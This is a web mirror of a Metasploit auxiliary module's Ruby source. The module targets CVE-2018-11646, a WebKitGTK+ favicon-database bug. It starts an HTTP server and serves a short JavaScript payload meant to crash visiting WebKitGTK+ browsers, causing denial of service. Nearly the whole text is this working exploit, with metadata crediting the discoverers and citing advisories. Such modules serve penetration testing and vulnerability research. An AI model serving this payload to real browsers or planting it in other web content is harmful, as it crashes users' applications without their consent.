CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/dos/http/webkitplus.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpServer7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => "WebKitGTK+ WebKitFaviconDatabase DoS",14'Description' => %q(15This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.16If successful, it could lead to application crash, resulting in denial of service.17),18'License' => MSF_LICENSE,19'Author' => [20'Dhiraj Mishra', # Original discovery, disclosure21'Hardik Mehta', # Original discovery, disclosure22'Zubin Devnani', # Original discovery, disclosure23'Manuel Caballero' #JS Code24],25'References' => [26['EDB', '44842'],27['CVE', '2018-11646'],28['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],29['URL', 'https://www.inputzero.io/2018/06/cve-2018-11646-webkit.html']30],31'DisclosureDate' => '2018-06-03',32'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],33'PassiveActions' => [ 'WebServer' ],34'DefaultAction' => 'WebServer'35)36)37end3839def run40exploit # start http server41end4243def setup44@html = <<-JS45<script type="text/javascript">46win = window.open("WIN", "WIN");47window.open("http://example.com/", "WIN");48win.document.execCommand('stop');49win.document.write("HelloWorld");50win.document.close();51</script>52JS53end5455def on_request_uri(cli, _request)56print_status('Sending response')57send_response(cli, @html)58end59end606162